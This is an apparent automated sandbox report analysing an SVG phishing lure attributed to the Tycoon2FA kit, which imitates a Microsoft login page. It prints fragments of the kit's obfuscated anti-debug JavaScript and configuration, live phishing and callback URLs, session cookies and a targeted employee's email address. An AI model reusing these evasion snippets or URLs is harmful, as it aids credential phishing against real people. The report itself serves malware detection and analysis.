Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
Qvc_Audio-Play.0044.svg

Overview

General Information

Sample name:Qvc_Audio-Play.0044.svg
Analysis ID:1647992
MD5:67c678365ee489ae7ac08702cb85eb77
SHA1:c2a9a2ddc041f6c604f313a13eaf84af708583b0
SHA256:537e30c9807fc62a726c490d6cdeed931151b9c482b0c6239cf440b9538a81cb
Infos:

Detection

HTMLPhisher, Invisible JS, Tycoon2FA
Score:100
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected AntiDebug via timestamp check
Yara detected HtmlPhish10
Yara detected Invisible JS
Yara detected Obfuscation Via HangulCharacter
Yara detected Tycoon 2FA PaaS
AI detected suspicious Javascript
Yara detected JavaScript embedded in SVG
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64_ra
  • chrome.exe (PID: 6376 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\Qvc_Audio-Play.0044.svg MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6568 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1948,i,10220445616939681397,10491532764567568754,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2112 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Qvc_Audio-Play.0044.svgJoeSecurity_JavaScriptembeddedinSVGYara detected JavaScript embedded in SVGJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    dropped/chromecache_75JoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security

      HTML

      SourceRuleDescriptionAuthorStrings
      0.0.pages.csvJoeSecurity_HangulCharacterYara detected Obfuscation Via HangulCharacterJoe Security
        0.0.pages.csvJoeSecurity_InvisibleJSYara detected Invisible JSJoe Security
          0.1.d.script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
            0.1.d.script.csvJoeSecurity_AntiDebugBrowserYara detected AntiDebug via timestamp checkJoe Security
              1.11..script.csvJoeSecurity_Tycoon2FA_1Yara detected Tycoon 2FA PaaSJoe Security
                Click to see the 18 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                • Phishing
                • Compliance
                • Software Vulnerabilities
                • Networking
                • System Summary
                • Malware Analysis System Evasion

                Click to jump to signature section

                Show All Signature Results

                Phishing

                barindex
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL 'gt.prjnyvhqq.es' does not match the legitimate domain 'microsoft.com'., The domain 'prjnyvhqq.es' is not associated with Microsoft and appears random, which is suspicious., The use of a '.es' domain extension is unusual for Microsoft, which typically uses '.com'., The URL structure does not include any recognizable Microsoft-related terms., The email domain 'qvc.com' in the input fields does not match the brand 'Microsoft', which is unusual. DOM: 1.3.pages.csv
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The legitimate domain for Microsoft is 'microsoft.com'., The provided URL 'gt.prjnyvhqq.es' does not match the legitimate domain for Microsoft., The URL contains a random string 'prjnyvhqq' which is suspicious and not associated with Microsoft., The domain extension '.es' is unusual for Microsoft, which typically uses '.com'., The presence of a password input field on a non-legitimate domain is a common phishing tactic. DOM: 1.4.pages.csv
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.pages.csv, type: HTML
                Source: Yara matchFile source: 0.0.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.5..script.csv, type: HTML
                Source: Yara matchFile source: 0.1.pages.csv, type: HTML
                Source: Yara matchFile source: 1.19..script.csv, type: HTML
                Source: Yara matchFile source: dropped/chromecache_75, type: DROPPED
                Source: Yara matchFile source: 1.16.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.1.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.11..script.csv, type: HTML
                Source: Yara matchFile source: 0.9.d.script.csv, type: HTML
                Source: Yara matchFile source: 0.4.d.script.csv, type: HTML
                Source: Yara matchFile source: 1.12..script.csv, type: HTML
                Source: Yara matchFile source: 1.3.pages.csv, type: HTML
                Source: Yara matchFile source: 1.4.pages.csv, type: HTML
                Source: 0.3..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZ... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated code/URLs. The script appears to be attempting to execute malicious code and collect sensitive user data, which is a clear indication of malicious intent.
                Source: 0.8..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZ... This script demonstrates several high-risk behaviors, including dynamic code execution, potential data exfiltration, and suspicious redirection. The use of obfuscated code and the presence of a debugger trap further increase the risk. Overall, this script exhibits a high level of malicious intent and should be considered a significant security threat.
                Source: 1.15..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4... This script demonstrates several high-risk behaviors, including dynamic code execution (via `eval`), data exfiltration (sending user data to external servers), and the use of obfuscated code/URLs. The script also exhibits moderate-risk behaviors such as external data transmission and the use of multiple fallback domains. Overall, the combination of these behaviors indicates a high likelihood of malicious intent, warranting a high-risk score.
                Source: 1.12..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. It attempts to detect the presence of web automation tools and redirects the user to a blank page, which is a common tactic used in malicious scripts. Additionally, the script intercepts keyboard and context menu events, potentially to prevent the user from accessing certain functionality. The use of setInterval with a debugger statement and the encoded string decryption function further suggest malicious intent. Overall, this script demonstrates a high level of risk and should be treated with caution.
                Source: 0.5..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZ... This script demonstrates high-risk behavior with the use of the `eval` function to execute dynamic code. The obfuscated string is decoded and then evaluated, which can lead to the execution of malicious code. Additionally, the script uses a `Proxy` object to intercept property access, further increasing the risk of potential exploitation. Overall, this script exhibits a high level of risk and should be thoroughly reviewed before execution.
                Source: 1.11..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and aggressive DOM manipulation. It checks for the presence of web automation tools, blocks common keyboard shortcuts, disables right-click context menus, and periodically triggers a debugger to redirect the user to an external website. Additionally, it intercepts the clipboard copy event to replace the copied content with a custom string. These behaviors are highly suspicious and indicate a potentially malicious intent, warranting a high-risk score.
                Source: Yara matchFile source: Qvc_Audio-Play.0044.svg, type: SAMPLE
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Number of links: 0
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: <input type="password" .../> found but no <form action="...
                Source: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tHTTP Parser: Base64 decoded: if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:blank";}document.addEventListener("keydown", function (event) { function XgQUAkpJax(event) { co...
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Title: Secure Access To Encrypted VN does not match URL
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Invalid link: Terms of use
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Invalid link: Privacy & cookies
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Invalid link: Terms of use
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: Invalid link: Privacy & cookies
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: var otherweburl = "";var websitenames = ["godaddy", "okta"];var bes = ["apple.com","netflix.com"];var pes = ["https:\/\/t.me\/","https:\/\/t.com\/","t.me\/","https:\/\/t.me.com\/","t.me.com\/","t.me@","https:\/\/t.me@","https:\/\/t.me","https:\/\/t.com","t.me","https:\/\/t.me.com","t.me.com","t.me\/@","https:\/\/t.me\/@","https:\/\/t.me@\/","t.me@\/","https:\/\/www.telegram.me\/","https:\/\/www.telegram.me"];var capnum = 1;var appnum = 1;var pvn = 0;var view = "";var pagelinkval = "2pnv";var emailcheck = "michael.dunne@qvc.com";var webname = "rtrim(/web9/, '/')";var urlo = "/vsa63gyxm8vr7xw3vpjzf7ihjg0degf4hb3ynikxxywljfvoycsuvrsyf9wkyqq1gc5fcm";var gdf = "/ghs0dzo1sqtludizm8wxpt4dyruhfrrwmqgo6cd118";var odf = "/ijszeppujfqn6dhlekwwxrd9nipk4cxwv7mmybwcd644";var twa = 0;var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";var useragent = navigator.useragent;var browsername;var userip;var usercountry;var errorcodeexecuted = false;...
                Source: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tHTTP Parser: function ongtbtrerw(){iinxkilwor = atob("pcfet0nuwvbfigh0bww+cjxodg1sigxhbmc9imvuij4kpghlywq+ciagpg1ldgegy2hhcnnldd0ivvrgltgipgogidxtzxrhig5hbwu9inzpzxdwb3j0iibjb250zw50psj3awr0ad1kzxzpy2utd2lkdggsigluaxrpywwtc2nhbgu9ms4wij4kica8dgl0bgu+vgvjacbtb2x1dglvbnmglsbjbm5vdmf0aw5nihrozsbgdxr1cmu8l3rpdgxlpgogidxzdhlszt4kicagigjvzhkgewogicagicbmb250lwzhbwlsetogqxjpywwsihnhbnmtc2vyawy7ciagicagigxpbmutagvpz2h0oiaxljy7ciagicagig1hcmdpbjogmdskicagicagcgfkzgluzzogmdskicagicagymfja2dyb3vuzc1jb2xvcjogi2y0zjrmndskicagicagy29sb3i6icmzmzm7ciagicb9ciagicbozwfkzxigewogicagicbiywnrz3jvdw5koiajmda1ytllowogicagicbjb2xvcjogi2zmzjskicagicagcgfkzgluzzogmjbwecawowogicagicb0zxh0lwfsawduoibjzw50zxi7ciagicb9ciagicbozwfkzxigadegewogicagicbtyxjnaw46ida7ciagicagigzvbnqtc2l6ztogmi41cmvtowogicagfqogicagbmf2ihskicagicagymfja2dyb3vuzdogizmzmzskicagicagy29sb3i6icnmzmy7ciagicagihbhzgrpbmc6idewchg7ciagicagihrlehqtywxpz246ignlbnrlcjskicagih0kicagig5hdibhihskicagicagy29sb3i6icnmzmy7ciagicagihrlehqtzgvjb3jhdglvbjogbm9uztskicagicagbwfyz2luoiawide1chg7c...
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: <input type="password" .../> found
                Source: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tHTTP Parser: No favicon
                Source: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tHTTP Parser: No favicon
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No favicon
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No favicon
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No <meta name="author".. found
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No <meta name="author".. found
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No <meta name="copyright".. found
                Source: https://gt.prjnyvhqq.es/fbruonyidzxsulbgsofhvL4EQ4BMLTJDSQWQSMP7Y?KLHHELAXEGJEETZRVRAOHVUYHTTP Parser: No <meta name="copyright".. found
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49711 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.16:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.84.180:443 -> 192.168.2.16:49722 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 140.82.112.3:443 -> 192.168.2.16:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.11:443 -> 192.168.2.16:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.16:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.124.110:443 -> 192.168.2.16:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.16:49756 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.1.100:443 -> 192.168.2.16:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.26.0.100:443 -> 192.168.2.16:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49779 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.16:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49784 version: TLS 1.2
                Source: chrome.exeMemory has grown: Private usage: 17MB later: 31MB
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
                Source: unknownTCP traffic detected without corresponding DNS query: 142.250.176.195
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownTCP traffic detected without corresponding DNS query: 23.203.176.221
                Source: global trafficHTTP traffic detected: GET /3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29t HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlNESzhzWnhzekx1UGF2WXVSYzdxK1E9PSIsInZhbHVlIjoiRlBJdFlqOU1OWUwwV0ZHS2ZWeUtGMU9vQzdlQXl5bHN3bXdIZndadjFhYWdicTREWWlMYTl1YjJpelRVVzl5bEgyQlZrVzBwQ3JwN3R2UVdTam9IL3M2eWZzb3hEbkpKWlZ1US8vN2xqMnNCUlZGbFkrUFNUNlczSjhXSEJpcXciLCJtYWMiOiJkYTBjNTdmMzdmMTBlZmQ3ODRmMjAzZmJjNjgxOWVjY2UzYjJiMGI0NjYxMzczM2JmZWJiZTlhNWIxOGFhNzcwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjBvRW9jZFJCN1ZlVHhxS2RIcDFjSFE9PSIsInZhbHVlIjoiaytBRzJ5SitiUXlpRXV5Rnh3c2FTUDFwWkVRaHo3TDhDejVBR1R4UmRXRFVtNUw4ZlNuelk3cUJtZFRmN3g3SnhudVRKNFFGa2hTUmZiRjRSY29NNmdOR0loS1dVd1pUZkdkNmQ0U0Ftc1hlQXJqZ2hzeEs2UVRxMUt0VTg4Wk4iLCJtYWMiOiI0MDg2ZTA1OWRhOTcxZjUwNDAyOGJlMWVjODVlYzE4MDQxMDAxZmJiNDU0MTYyNmIxNzFjY2FjMWVhYTUxYjE5IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /kabutar@b3o9bss8 HTTP/1.1Host: m60ri.kdyukk.ruConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gt.prjnyvhqq.esSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gt.prjnyvhqq.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /kabutar@b3o9bss8 HTTP/1.1Host: m60ri.kdyukk.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29t HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://gt.prjnyvhqq.es/3EaWQm0/$bWljaGFlbC5kdW5uZUBxdmMuY29tAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InkyVDRUMytPdFpyYTVOMzIzaXIwVFE9PSIsInZhbHVlIjoicWtHcE1tNFRGYUZQbXVhd3hOOHJPWXR0NXM1RW15UTJtTmtqQkZUMHR3RUlSdkNXeG5iWTBDd2VSM1lIcmlSSkpxNE1IUGRXbitLcXFWb2Z3TC80b3FsS1ZBZjNoSGYrUHl1WTNmNWdZMThQdEdSZE0rbmJDWXdjRzEzNmplU2ciLCJtYWMiOiJlNzM4M2Y5YjhmZTVmNzY3NDE2MjkwZTRhYjI5MjRhMTA3NDFlYzE1N2I2NjMwNjM5MTIzNTFiYjM0Yjg2NDYwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlFMDF3bHlXZGZlV2Z1cHBoM2pwM0E9PSIsInZhbHVlIjoiUE5TcndWcW9JZDBFcER6aVl2QjBVNm1vSUNCQTYyVjNja3hMZVF1R1FXQzhHVUphbExycTVDMzErZkpRb2JIZW80enliTk1QODdFQ2o0MWpRb0QzZm96UEpVdTZ4cXlyd2FhYktxS0s1VkNUckYvNThSL245S2NPVUNad0lDY0QiLCJtYWMiOiI2MzBkYWYxY2I5ZGNiZTdmMDIzMjVlMDBhOWMzMGY4ZmRhNjY5MTI2Yjg2ZWI1YjFmNDlmN2U2OWU4ZjNjZGM3IiwidGFnIjoiIn0%3D
                Source: global trafficHTTP traffic detected: GET /nmZcEpqVzbN0D7DR1eriuX5be3DrmWrTAkIjw5 HTTP/1.1Host: gt.prjnyvhqq.esConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6InkyVDRUMytPdFpyYTVOMzIzaXIwVFE9PSIsInZhbHVlIjoicWtHcE1tNFRGYUZQbXVhd3hOOHJPWXR0NXM1RW15UTJtTmtqQkZUMHR3RUlSdkNXeG5iWTBDd2VSM1lIcmlSSkpxNE1IUGRXbitLcXFWb2Z3TC80b3FsS1ZBZjNoSGYrUHl1WTNmNWdZMThQdEdSZE0rbmJDWXdjRzEzNmplU2ciLCJtYWMiOiJlNzM4M2Y5YjhmZTVmNzY3NDE2MjkwZTRhYjI5MjRhMTA3NDFlYzE1N2I2NjMwNjM5MTIzNTFiYjM0Yjg2NDYwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjlFMDF3bHlXZGZlV2Z1cHBoM2pwM0E9PSIsInZhbHVlIjoiUE5TcndWcW9JZDBFcER6aVl2QjBVNm1vSUNCQTYyVjNja3hMZVF1R1FXQzhHVUphbExycTVDMzErZkpRb2JIZW80enliTk1QODdFQ2o0MWpRb0QzZm96UEpVdTZ4cXlyd2FhYktxS0s1VkNUckYvNThSL245S2NPVUNad0lDY0QiLCJtYWMiOiI2MzBkYWYxY2I5ZGNiZTdmMDIzMjVlMDBhOWMzMGY4ZmRhNjY5MTI2Yjg2ZWI1YjFmNDlmN2U2OWU4ZjNjZGM3IiwidGFnIjoiIn0%3D
